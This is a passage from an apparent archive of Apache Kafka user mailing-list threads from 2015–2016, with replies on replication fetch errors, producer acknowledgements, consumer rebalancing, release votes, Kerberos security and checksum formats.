> List(2, 4), [topic1,13] -> List(2, 4), [topic1,0] -> List(2, 4), [topic1,4]
> -> List(2, 4), [topic1,5] -> List(2, 4), [topic1,10] -> List(2, 4),
> [topic1,7] -> List(2, 4)), 3 -> Map([topic1,33] -> List(3, 5), [topic1,30]
> -> List(3, 5), [topic1,24] -> List(3, 5), [topic1,36] -> List(3, 5),
> [topic1,38] -> List(3, 5), [topic1,26] -> List(3, 5), [topic1,27] ->
> List(3, 5), [topic1,39] -> List(3, 5), [topic1,29] -> List(3, 5),
> [topic1,34] -> List(3, 5), [topic1,28] -> List(3, 5), [topic1,32] ->
> List(3, 5), [topic1,35] -> List(3, 5), [topic1,25] -> List(3, 5),
> [topic1,31] -> List(3, 5), [topic1,37] -> List(3, 5)), 4 -> Map([topic1,53]
> -> List(4, 2), [topic1,56] -> List(4, 2), [topic1,49] -> List(4, 2),
> [topic1,50] -> List(4, 2), [topic1,51] -> List(4, 2), [topic1,58] ->
> List(4, 2), [topic1,63] -> List(4, 2), [topic1,54] -> List(4, 2),
> [topic1,48] -> List(4, 2), [topic1,61] -> List(4, 2), [topic1,62] ->
> List(4, 2), [topic1,57] -> List(4, 2), [topic1,60] -> List(4, 2),
> [topic1,52] -> List(4, 2), [topic1,55] -> List(4, 2), [topic1,59] ->
> List(4, 2))) (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] DEBUG [Controller 2]: topics not in preferred
> replica Map() (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] TRACE [Controller 2]: leader imbalance ratio for
> broker 0 is 0.00 (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] DEBUG [Controller 2]: topics not in preferred
> replica Map() (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] TRACE [Controller 2]: leader imbalance ratio for
> broker 5 is 0.00 (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] DEBUG [Controller 2]: topics not in preferred
> replica Map() (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] TRACE [Controller 2]: leader imbalance ratio for
> broker 1 is 0.00 (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,296] DEBUG [Controller 2]: topics not

Re: Issue adding server (0.10.0.0)

2016-08-17 Thread Jun Rao
Jarko,

Do you have many topic partitions? Currently, if #partitions *
fetched_bytes in the response exceeds 2GB, we will get an integer overflow
and weird things can happen. We are trying to address this better in
KIP-74. If this is the issue, for now, you can try reducing the fetch size
or increasing the replica fetch threads to work around the issue.
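
For example, the workaround amounts to server.properties changes along these
lines (the values are illustrative and should be tuned to your message sizes):

    # fetch less per partition so #partitions * fetch_size stays under 2GB
    replica.fetch.max.bytes=1048576
    # spread the partitions over more replica fetcher threads
    num.replica.fetchers=4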

Thanks,

Jun

On Wed, Aug 17, 2016 at 3:04 AM, J Mes  wrote:

> Hello,
>
> I have a cluster of 3 nodes running kafka v.0.10.0.0. This cluster was
> started about a week ago with no data, with no issues starting up.
> Today we noticed 1 of the servers in the cluster did not work anymore; we
> checked and indeed the server was down and all of its data was old.
>
> We restarted the node without data, thinking it should sync up and then
> join the cluster again, but we keep getting the following error:
>
> [2016-08-17 12:02:23,620] WARN [ReplicaFetcherThread-0-1], Error in fetch
> kafka.server.ReplicaFetcherThread$FetchRequest@62b3e70c (kafka.server.
> ReplicaFetcherThread)
> org.apache.kafka.common.protocol.types.SchemaException: Error reading
> field 'responses': Error reading field 'partition_responses': Error reading
> field 'record_set': Error reading bytes of size 104856430, only 18764961
> bytes available
> at org.apache.kafka.common.protocol.types.Schema.read(
> Schema.java:73)
> at org.apache.kafka.clients.NetworkClient.parseResponse(
> NetworkClient.java:380)
> at org.apache.kafka.clients.NetworkClient.handleCompletedReceives(
> NetworkClient.java:449)
> at org.apache.kafka.clients.NetworkClient.poll(
> NetworkClient.java:269)
> at kafka.utils.NetworkClientBlockingOps$.recursivePoll$2(
> NetworkClientBlockingOps.scala:136)
> at kafka.utils.NetworkClientBlockingOps$.kafka$utils$
> NetworkClientBlockingOps$$pollContinuously$extension(
> NetworkClientBlockingOps.scala:143)
> at kafka.utils.NetworkClientBlockingOps$.blockingSendAndReceive$
> extension(NetworkClientBlockingOps.scala:80)
> at kafka.server.ReplicaFetcherThread.sendRequest(
> ReplicaFetcherThread.scala:244)
> at kafka.server.ReplicaFetcherThread.fetch(
> ReplicaFetcherThread.scala:229)
> at kafka.server.ReplicaFetcherThread.fetch(
> ReplicaFetcherThread.scala:42)
> at kafka.server.AbstractFetcherThread.processFetchRequest(
> AbstractFetcherThread.scala:107)
> at kafka.server.AbstractFetcherThread.doWork(
> AbstractFetcherThread.scala:98)
> at kafka.utils.ShutdownableThread.run(ShutdownableThread.scala:63)
>
> All nodes are running the exact same version of zookepeer/kafka.
>
> When we clear all data from all nodes and start again, everything works...
>
> Any idea anyone?
>
> Kr,
> Jarko Mesuere


Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-17 Thread Jun Rao
Are you using acks=1 or acks=all in the producer? Only the latter
guarantees acked messages won't be lost after leader failure.
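
For reference, a minimal sketch of a Java producer configured for the stronger
guarantee (the bootstrap address and topic are placeholders):

    Properties props = new Properties();
    props.put("bootstrap.servers", "localhost:9092");
    props.put("acks", "all"); // wait for all in-sync replicas to acknowledge
    props.put("key.serializer",
        "org.apache.kafka.common.serialization.StringSerializer");
    props.put("value.serializer",
        "org.apache.kafka.common.serialization.StringSerializer");

    Producer<String, String> producer = new KafkaProducer<>(props);
    // Blocking on get() surfaces any send error instead of dropping it.
    producer.send(new ProducerRecord<String, String>("test", "payload")).get();
    producer.close();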

Thanks,

Jun

On Wed, Aug 10, 2016 at 11:41 PM, Mazhar Shaikh 
wrote:

> Hi Kafka Team,
>
> I'm using kafka (kafka_2.11-0.9.0.1) with librdkafka (0.8.1) API for
> producer
> During a run of 2hrs, I noticed that the total number of messages ack'd by
> librdkafka delivery reports is greater than the max offset of a partition in
> the kafka broker.
> I'm running kafka broker with replication factor of 2.
>
> Here, messages have been lost between librdkafka and the kafka broker.
>
> librdkafka is providing success delivery reports for all the messages.
>
> It looks like the kafka broker is dropping the messages after acknowledging
> librdkafka.
>
> Requesting your help in solving this issue.
>
> Thank you.
>
>
> Regards
> Mazhar Shaikh
>


Re: [kafka-clients] [ANNOUCE] Apache Kafka 0.10.0.1 Released

2016-08-11 Thread Jun Rao
Ismael,

Thanks for running the release.

Jun

On Wed, Aug 10, 2016 at 5:01 PM, Ismael Juma  wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 0.10.0.1.
> This is a bug fix release that fixes 53 issues in 0.10.0.0.
>
> All of the changes in this release can be found in the release notes:
> https://archive.apache.org/dist/kafka/0.10.0.1/RELEASE_NOTES.html
>
> Apache Kafka is a high-throughput, publish-subscribe messaging system
> rethought as a distributed commit log.
>
> ** Fast => A single Kafka broker can handle hundreds of megabytes of reads
> and writes per second from thousands of clients.
>
> ** Scalable => Kafka is designed to allow a single cluster to serve as the
> central data backbone for a large organization. It can be elastically and
> transparently expanded without downtime. Data streams are partitioned
> and spread over a cluster of machines to allow data streams larger than
> the capability of any single machine and to allow clusters of co-ordinated
> consumers.
>
> ** Durable => Messages are persisted on disk and replicated within the
> cluster to prevent data loss. Each broker can handle terabytes of messages
> without performance impact.
>
> ** Distributed by Design => Kafka has a modern cluster-centric design that
> offers strong durability and fault-tolerance guarantees.
>
> You can download the source release from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.0.1/kafka-0.10.0.1
> -src.tgz
>
> and binary releases from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.0.1/kafka_2.10-0.10
> .0.1.tgz
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.0.1/kafka_2.11-0.10
> .0.1.tgz
>
> A big thank you for the following people who have contributed to the
> 0.10.0.1 release.
>
> Alex Glikson, Alex Loddengaard, Alexey Romanchuk, Ashish Singh, Avi Flax,
> Damian Guy, Dustin Cote, Edoardo Comar, Eno Thereska, Ewen
> Cheslack-Postava, Flavio Junqueira, Florian Hussonnois, Geoff Anderson,
> Grant Henke, Greg Fodor, Guozhang Wang, Gwen Shapira, Henry Cai, Ismael
> Juma, Jason Gustafson, Jeff Klukas, Jendrik Poloczek, Jeyhun Karimov,
> Liquan Pei, Manikumar Reddy O, Mathieu Fenniak, Matthias J. Sax, Maysam
> Yabandeh, Mayuresh Gharat, Mickael Maison, Moritz Siuts, Onur Karaman,
> Philippe Derome, Rajini Sivaram, Rollulus, Ryan Pridgeon, Samuel Taylor,
> Sebastien Launay, Sriharsha Chintalapani, Tao Xiao, Todd Palino, Tom
> Crayford, Tom Rybak, Vahid Hashemian, Wan Wenli, Yuto Kawamura.
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> http://kafka.apache.org/
>
> Thanks,
> Ismael
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAD5tkZZ7xUt7wpuLr8i3isV34L-GB%2BZA9mwkA3HJvASnb5YTUA%
> 40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>


Re: [VOTE] 0.10.0.0 RC6

2016-05-19 Thread Jun Rao
Thanks for running the release. +1 from me. Verified the quickstart.

Jun

On Tue, May 17, 2016 at 10:00 PM, Gwen Shapira  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the seventh (!) candidate for release of Apache Kafka
> 0.10.0.0. This is a major release that includes: (1) New message
> format including timestamps (2) client interceptor API (3) Kafka
> Streams.
>
> This RC was rolled out to fix an issue with our packaging that caused
> dependencies to leak in ways that broke our licensing, and an issue
> with protocol versions that broke upgrade for LinkedIn and others who
> may run from trunk. Thanks to Ewen, Ismael, Becket and Jun for finding and
> fixing these issues.
>
> Release notes for the 0.10.0.0 release:
> http://home.apache.org/~gwenshap/0.10.0.0-rc6/RELEASE_NOTES.html
>
> Let's try to vote within the 72h release vote window and get this baby
> out already!
>
> *** Please download, test and vote by Friday, May 20, 23:59 PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~gwenshap/0.10.0.0-rc6/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * java-doc
> http://home.apache.org/~gwenshap/0.10.0.0-rc6/javadoc/
>
> * tag to be voted upon (off 0.10.0 branch) is the 0.10.0.0 tag:
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=065899a3bc330618e420673acf9504d123b800f3
>
> * Documentation:
> http://kafka.apache.org/0100/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0100/protocol.html
>
> /**
>
> Thanks,
>
> Gwen
>


Re: 0.9.0.1 RC1

2016-02-17 Thread Jun Rao
Christian,

Similar to other Apache projects, a vote from a committer is considered
binding. During the voting process, we encourage non-committers to vote as
well. We will cancel the release even if a critical issue is reported from
a non-committer.

Thanks,

Jun

On Tue, Feb 16, 2016 at 11:05 PM, Christian Posta <christian.po...@gmail.com
> wrote:

> BTW, what's the etiquette for votes (non-binding) for this community?
> welcomed? noise?
> happy to see the non-binding votes, I'd like to contribute, just don't want
> to pollute the vote call. thoughts?
> thanks!
>
> On Tue, Feb 16, 2016 at 10:56 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Thanks everyone for voting. The results are:
> >
> > +1 binding = 4 votes (Ewen Cheslack-Postava, Neha Narkhede, Joel Koshy
> and
> > Jun
> > Rao)
> > +1 non-binding = 3 votes
> > -1 = 0 votes
> > 0 = 0 votes
> >
> > The vote passes.
> >
> > I will release artifacts to maven central, update the dist svn and
> download
> > site. Will send out an announce after that.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Feb 11, 2016 at 6:55 PM, Jun Rao <j...@confluent.io> wrote:
> >
> > > This is the first candidate for release of Apache Kafka 0.9.0.1. This is
> > > a bug fix release that fixes 70 issues.
> > >
> > > Release Notes for the 0.9.0.1 release
> > >
> >
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html
> > >
> > > *** Please download, test and vote by Tuesday, Feb. 16, 7pm PT
> > >
> > > Kafka's KEYS file containing PGP keys we use to sign the release:
> > > http://kafka.apache.org/KEYS in addition to the md5, sha1
> > > and sha2 (SHA256) checksum.
> > >
> > > * Release artifacts to be voted upon (source and binary):
> > > https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/
> > >
> > > * Maven artifacts to be voted upon prior to release:
> > > https://repository.apache.org/content/groups/staging/org/apache/kafka/
> > >
> > > * scala-doc
> > > https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/
> > >
> > > * java-doc
> > > https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/
> > >
> > > * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
> > >
> > >
> >
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89
> > >
> > > * Documentation
> > > http://kafka.apache.org/090/documentation.html
> > >
> > > Thanks,
> > >
> > > Jun
> > >
> > >
> >
>
>
>
> --
> *Christian Posta*
> twitter: @christianposta
> http://www.christianposta.com/blog
> http://fabric8.io
>


Re: 0.9.0.1 RC1

2016-02-16 Thread Jun Rao
Thanks everyone for voting. The results are:

+1 binding = 4 votes (Ewen Cheslack-Postava, Neha Narkhede, Joel Koshy and Jun
Rao)
+1 non-binding = 3 votes
-1 = 0 votes
0 = 0 votes

The vote passes.

I will release artifacts to maven central, update the dist svn and download
site. Will send out an announce after that.

Thanks,

Jun

On Thu, Feb 11, 2016 at 6:55 PM, Jun Rao <j...@confluent.io> wrote:

> This is the first candidate for release of Apache Kafka 0.9.0.1. This is a
> bug fix release that fixes 70 issues.
>
> Release Notes for the 0.9.0.1 release
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, Feb. 16, 7pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS in addition to the md5, sha1
> and sha2 (SHA256) checksum.
>
> * Release artifacts to be voted upon (source and binary):
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/
>
> * Maven artifacts to be voted upon prior to release:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * scala-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/
>
> * java-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/
>
> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89
>
> * Documentation
> http://kafka.apache.org/090/documentation.html
>
> Thanks,
>
> Jun
>
>


Re: 0.9.0.1 RC1

2016-02-16 Thread Jun Rao
Since the unit test failures are transient, +1 from myself.

Thanks,

Jun

On Thu, Feb 11, 2016 at 6:55 PM, Jun Rao <j...@confluent.io> wrote:

> This is the first candidate for release of Apache Kafka 0.9.0.1. This is a
> bug fix release that fixes 70 issues.
>
> Release Notes for the 0.9.0.1 release
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, Feb. 16, 7pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS in addition to the md5, sha1
> and sha2 (SHA256) checksum.
>
> * Release artifacts to be voted upon (source and binary):
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/
>
> * Maven artifacts to be voted upon prior to release:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * scala-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/
>
> * java-doc
> https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/
>
> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89
>
> * Documentation
> http://kafka.apache.org/090/documentation.html
>
> Thanks,
>
> Jun
>
>


0.9.0.1 RC1

2016-02-11 Thread Jun Rao
This is the first candidate for release of Apache Kafka 0.9.0.1. This is a bug
fix release that fixes 70 issues.

Release Notes for the 0.9.0.1 release
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/RELEASE_NOTES.html

*** Please download, test and vote by Tuesday, Feb. 16, 7pm PT

Kafka's KEYS file containing PGP keys we use to sign the release:
http://kafka.apache.org/KEYS in addition to the md5, sha1
and sha2 (SHA256) checksum.

* Release artifacts to be voted upon (source and binary):
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/

* Maven artifacts to be voted upon prior to release:
https://repository.apache.org/content/groups/staging/org/apache/kafka/

* scala-doc
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/scaladoc/

* java-doc
https://home.apache.org/~junrao/kafka-0.9.0.1-candidate1/javadoc/

* The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.1 tag
https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=2c17685a45efe665bf5f24c0296cb8f9e1157e89

* Documentation
http://kafka.apache.org/090/documentation.html

Thanks,

Jun


Re: Caused by: org.apache.kafka.common.errors.TimeoutException: Failed to update metadata after 60000 ms.

2016-02-08 Thread Jun Rao
It seems that you put in the wrong port in the following statement. Kafka's
default port is 9092. 2181 is for Zookeeper.
   props.put("bootstrap.servers", "localhost:2181");

Thanks,

Jun

On Mon, Feb 8, 2016 at 4:06 AM, Bhargav Maddikera <
bhargav.maddik...@altimetrik.com> wrote:

> Hi,
>
> I tried executing this code:
>
>Properties props = new Properties();
>
>props.put("bootstrap.servers", "localhost:2181");
>   props.put("metadata.broker.list","localhost:9092");
>   props.put("request.required.acks", "1");
>   props.put("retries", 4);
> //props.put("batch.size", 16384);
> //props.put("linger.ms", 1);
> //props.put("buffer.memory", 33554432);
>   props.put("key.serializer",
> "org.apache.kafka.common.serialization.StringSerializer");
>   props.put("value.serializer",
> "org.apache.kafka.common.serialization.StringSerializer");
>
>   Producer<String, String> producer = new KafkaProducer<String, String>(props);
>   int maxMessages = 1000;
>
>   int count = 0;
>   while(count < maxMessages) {
> producer.send(new ProducerRecord<String, String>("test",  "message --- #"+count++)).get();
> System.out.println("Message send.."+count);
>   }
>   producer.close();
>
>
>
> but I get Caused by: org.apache.kafka.common.errors.TimeoutException:
> Failed to update metadata after 60000 ms.
>
>
> But when I  do,
>
> //Properties properties = new Properties();
> // properties.put("metadata.broker.list","localhost:9092");
> //
>  properties.put("serializer.class","kafka.serializer.StringEncoder");
> // properties.put("partitioner.class", "SimplePartitioner");
> // properties.put("request.required.acks", "1");
> // ProducerConfig producerConfig = new
> ProducerConfig(properties);
> // kafka.javaapi.producer.Producer<String, String> producer =
> new kafka.javaapi.producer.Producer<String, String>(producerConfig);
> // SimpleDateFormat sdf = new SimpleDateFormat();
> // KeyedMessage<String, String> message = new KeyedMessage<String,
> String>("test","1","After Restart210");
> // System.out.println(message.key());
> // producer.send(message);
> // producer.close();
> // System.out.println("done");
>
> It works fine.
>
> Regards.
> Bhargav.
>


Kafka 0.9.0.1 plan

2016-02-05 Thread Jun Rao
Hi, Everyone,

We have fixed a few critical bugs since 0.9.0.0 was released and are still
investigating a few more issues. The current list of issues tracked for
0.9.0.1 can be found below. Among them, only KAFKA-3159 seems to be
critical.

https://issues.apache.org/jira/issues/?jql=project%20%3D%20KAFKA%20AND%20status%20in%20(Open%2C%20%22In%20Progress%22%2C%20Reopened%2C%20%22Patch%20Available%22)%20AND%20fixVersion%20%3D%200.9.0.1

Once all critical issues are resolved, we will start the release process of
0.9.0.1. Our current plan is to do that next week.

Thanks,

Jun


Re: Stuck consumer with new consumer API in 0.9

2016-01-26 Thread Jun Rao
Rajiv,

We haven't released 0.9.0.1 yet. To try the fix, you can build a new client
jar off the 0.9.0 branch.

Thanks,

Jun

On Mon, Jan 25, 2016 at 12:03 PM, Rajiv Kurian  wrote:

> Thanks Jason. We are using an affected client I guess.
>
> Is there a 0.9.0 client available on maven? My search at
> http://mvnrepository.com/artifact/org.apache.kafka/kafka_2.10 only shows
> the 0.9.0.0 client which seems to have this issue.
>
>
> Thanks,
> Rajiv
>
> On Mon, Jan 25, 2016 at 11:56 AM, Jason Gustafson 
> wrote:
>
> > Hey Rajiv, the bug was on the client. Here's a link to the JIRA:
> > https://issues.apache.org/jira/browse/KAFKA-2978.
> >
> > -Jason
> >
> > On Mon, Jan 25, 2016 at 11:42 AM, Rajiv Kurian 
> wrote:
> >
> > > Hi Jason,
> > >
> > > Was this a server bug or a client bug?
> > >
> > > Thanks,
> > > Rajiv
> > >
> > > On Mon, Jan 25, 2016 at 11:23 AM, Jason Gustafson 
> > > wrote:
> > >
> > > > Apologies for the late arrival to this thread. There was a bug in the
> > > > 0.9.0.0 release of Kafka which could cause the consumer to stop
> > fetching
> > > > from a partition after a rebalance. If you're seeing this, please
> > > checkout
> > > > the 0.9.0 branch of Kafka and see if you can reproduce this problem.
> If
> > > you
> > > > can, then it would be really helpful if you file a JIRA with the
> steps
> > to
> > > > reproduce.
> > > >
> > > > From Han's initial example, it kind of looks like the problem might
> be
> > in
> > > > the usage. The consumer lag as shown by the kafka-consumer-groups
> > script
> > > > relies on the last committed position to determine lag. To update
> > > progress,
> > > > you need to commit offsets regularly. In the gist, offsets are only
> > > > committed on shutdown or when a rebalance occurs. When the group is
> > > stable,
> > > > no progress will be seen because there are no commits to update the
> > > > position.
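
(As an illustration of committing regularly with auto commit disabled, a
minimal poll loop might look like the sketch below; the poll timeout and the
process() helper are made up.)

    while (true) {
        ConsumerRecords<String, String> records = consumer.poll(100);
        for (ConsumerRecord<String, String> record : records) {
            process(record); // application-specific handling
        }
        // Committing after each batch keeps the group's position, and thus
        // the reported lag, moving instead of updating only on
        // shutdown/rebalance.
        consumer.commitSync();
    }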
> > > >
> > > > Thanks,
> > > > Jason
> > > >
> > > > On Mon, Jan 25, 2016 at 9:09 AM, Ismael Juma 
> > wrote:
> > > >
> > > > > Thanks!
> > > > >
> > > > > Ismael
> > > > >
> > > > > On Mon, Jan 25, 2016 at 4:03 PM, Han JU 
> > > wrote:
> > > > >
> > > > > > Issue created: https://issues.apache.org/jira/browse/KAFKA-3146
> > > > > >
> > > > > > 2016-01-25 16:07 GMT+01:00 Han JU :
> > > > > >
> > > > > > > Hi Bruno,
> > > > > > >
> > > > > > > Can you tell me a little bit more about that? A seek() in the
> > > > > > > `onPartitionAssigned`?
> > > > > > >
> > > > > > > Thanks.
> > > > > > >
> > > > > > > 2016-01-25 10:51 GMT+01:00 Han JU :
> > > > > > >
> > > > > > >> Ok I'll create a JIRA issue on this.
> > > > > > >>
> > > > > > >> Thanks!
> > > > > > >>
> > > > > > >> 2016-01-23 21:47 GMT+01:00 Bruno Rassaerts <
> > > > > bruno.rassae...@novazone.be
> > > > > > >:
> > > > > > >>
> > > > > > >>> +1 here
> > > > > > >>>
> > > > > > >>> As a workaround we seek to the current offset, which resets the
> > > > > > >>> current client's internal state, and everything continues.
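
(A sketch of that workaround, applied to every assigned partition:

    for (TopicPartition tp : consumer.assignment()) {
        // Seeking to the current position resets the consumer's internal
        // fetch state for the partition.
        consumer.seek(tp, consumer.position(tp));
    }
)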
> > > > > > >>>
> > > > > > >>> Regards,
> > > > > > >>> Bruno Rassaerts | Freelance Java Developer
> > > > > > >>>
> > > > > > >>> Novazone, Edingsesteenweg 302, B-1755 Gooik, Belgium
> > > > > > >>> T: +32(0)54/26.02.03 - M:+32(0)477/39.01.15
> > > > > > >>> bruno.rassae...@novazone.be -www.novazone.be
> > > > > > >>>
> > > > > > >>> > On 23 Jan 2016, at 17:52, Ismael Juma 
> > > wrote:
> > > > > > >>> >
> > > > > > >>> > Hi,
> > > > > > >>> >
> > > > > > >>> > Can you please file an issue in JIRA so that we make sure
> > this
> > > is
> > > > > > >>> > investigated?
> > > > > > >>> >
> > > > > > >>> > Ismael
> > > > > > >>> >
> > > > > > >>> >> On Fri, Jan 22, 2016 at 3:13 PM, Han JU <
> > > ju.han.fe...@gmail.com
> > > > >
> > > > > > >>> wrote:
> > > > > > >>> >>
> > > > > > >>> >> Hi,
> > > > > > >>> >>
> > > > > > >>> >> I'm prototyping with the new consumer API of kafka 0.9 and
> > I'm
> > > > > > >>> particularly
> > > > > > >>> >> interested in the `ConsumerRebalanceListener`.
> > > > > > >>> >>
> > > > > > >>> >> My test setup is like the following:
> > > > > > >>> >>  - 5M messages pre-loaded in one node kafka 0.9
> > > > > > >>> >>  - 12 partitions, auto offset commit set to false
> > > > > > >>> >>  - in `onPartitionsRevoked`, commit offset and flush the
> > local
> > > > > state
> > > > > > >>> >>
> > > > > > >>> >> The test run is like the following:
> > > > > > >>> >>  - launch one process with 2 consumers and let it consume
> > for
> > > a
> > > > > > while
> > > > > > >>> >>  - launch another process with 2 consumers, this triggers
> a
> > > > > > >>> rebalancing,
> > > > > > >>> >> and let these 2 processes run until messages are all
> > consumed
> > > > > > >>> >>
> > > > > > >>> >> The code is here:
> > > > > > https://gist.github.com/darkjh/fe1e5a5387bf13b4d4dd
> > > > > 

Re: Security in Kafka

2016-01-06 Thread Jun Rao
Mohit,

In 0.9, Kafka supports Kerberos. So, you can authenticate with any
directory service that supports Kerberos (e.g., Active Directory). Our
default authorization is based on individual users, not on groups though.

You can find a bit more info on security in the following links.

http://kafka.apache.org/090/documentation.html#security_sasl
http://docs.confluent.io/2.0.0/kafka/sasl.html
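
For example, a Kerberos setup on 0.9 involves broker settings along these
lines (host, port and principal name are placeholders):

    # server.properties
    listeners=SASL_PLAINTEXT://broker1.example.com:9093
    security.inter.broker.protocol=SASL_PLAINTEXT
    sasl.kerberos.service.name=kafka

and, on the client side, security.protocol=SASL_PLAINTEXT plus a JAAS login
configuration supplied via -Djava.security.auth.login.config.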

Thanks,

Jun

On Wed, Jan 6, 2016 at 9:30 AM, Mohit Anchlia 
wrote:

> In the 0.9 release it's not clear whether security features like LDAP
> authentication and authorization are available. If authN and authZ are
> available, can
> somebody point me to relevant documentation that shows how to configure
> Kafka to enable authN and authZ?
>


Re: MD5 checksum on release

2015-12-30 Thread Jun Rao
Xavier,

We also generate sha1 and sha2. Do we have to use different tools to
generate those too?

Thanks,

Jun

On Wed, Dec 30, 2015 at 2:29 PM, Xavier Stevens <xav...@simple.com> wrote:

> Hey Jun,
>
> I was expecting that you just used md5sum (GNU version).
>
> The nice part of using it is that when scripting a check it has a -c
> option:
>
> md5sum -c kafka_2.11-0.9.0.0.tgz.md5
>
> The difficult bit with what is currently there, is that it has a whole
> bunch of newlines and spacing in it. So I had to do some janky shell
> scripting to parse out what I wanted. Here's the basic gist of it if anyone
> finds this useful:
>
> SOURCE_CHECKSUM=`md5sum kafka_2.11-0.9.0.0.tgz | awk '{print $1}'`
> TARGET_CHECKSUM=`cat kafka_2.11-0.9.0.0.tgz.md5 | tr -d '\n' | awk '{ line
> = sprintf("%s", $0); gsub(/[[:space:]]/, "", line); split(line, parts,
> ":"); print tolower(parts[2]) }'`
> if [ "$SOURCE_CHECKSUM" == "$TARGET_CHECKSUM" ]
> ...
> fi
>
> Not a huge deal I just think it would make it easier for folks to use the
> former rather than GPG.
>
> Cheers,
>
>
> Xavier
>
>
> On Wed, Dec 30, 2015 at 2:00 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Xavier,
> >
> > The md5 checksum is generated by running "gpg --print-md MD5". Is there a
> > command that generates the output that you wanted?
> >
> > Thanks,
> >
> > Jun
> >
> > On Tue, Dec 29, 2015 at 5:13 PM, Xavier Stevens <xav...@simple.com>
> wrote:
> >
> > > The current md5 checksums of the release downloads all seem to be
> > returning
> > > in an atypical format. Anyone know what's going on there?
> > >
> > > Example:
> > >
> > >
> >
> https://dist.apache.org/repos/dist/release/kafka/0.9.0.0/kafka_2.11-0.9.0.0.tgz.md5
> > >
> > > I see:
> > >
> > > kafka_2.11-0.9.0.0.tgz: 08 4F B8
> > > 0C DC 8C
> > > 72 DC  75
> > > BC 35 19
> > > A5 D2 CC
> > > 5C
> > >
> > > I would expect to see something more like:
> > >
> > > 084fb80cdc8c72dc75bc3519a5d2cc5c kafka_2.11-0.9.0.0.tgz
> > >
> >
>


Re: MD5 checksum on release

2015-12-30 Thread Jun Rao
Xavier,

The md5 checksum is generated by running "gpg --print-md MD5". Is there a
command that generates the output that you wanted?

Thanks,

Jun

On Tue, Dec 29, 2015 at 5:13 PM, Xavier Stevens  wrote:

> The current md5 checksums of the release downloads all seem to be returning
> in an atypical format. Anyone know what's going on there?
>
> Example:
>
> https://dist.apache.org/repos/dist/release/kafka/0.9.0.0/kafka_2.11-0.9.0.0.tgz.md5
>
> I see:
>
> kafka_2.11-0.9.0.0.tgz: 08 4F B8
> 0C DC 8C
> 72 DC  75
> BC 35 19
> A5 D2 CC
> 5C
>
> I would expect to see something more like:
>
> 084fb80cdc8c72dc75bc3519a5d2cc5c kafka_2.11-0.9.0.0.tgz
>


Re: Why does'nt kafka replicate data automatically if a broker goes down

2015-12-28 Thread Jun Rao
Manju,

Your understanding is correct. I just added the following FAQ:

https://cwiki.apache.org/confluence/display/KAFKA/FAQ#FAQ-Howtoreplaceafailedbroker
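
(In short, per that FAQ entry: start a replacement server with the same
broker.id as the failed one, e.g. broker.id=3 in server.properties, and it
will rejoin the cluster and re-replicate the partitions it hosts; the id here
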